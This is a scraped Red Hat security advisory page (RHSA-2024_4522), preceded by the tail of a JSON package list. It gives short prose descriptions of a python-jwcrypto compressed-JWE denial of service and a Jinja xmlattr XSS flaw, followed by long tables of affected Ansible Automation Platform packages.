"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
}
]
}
RHSA-2024_4522
Vulnerability from csaf_redhat - Published: 2024-07-12 01:43 - Updated: 2024-12-17 20:57An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
Jinja is an extensible templating engine. The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe. This vulnerability is fixed in 3.1.4.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
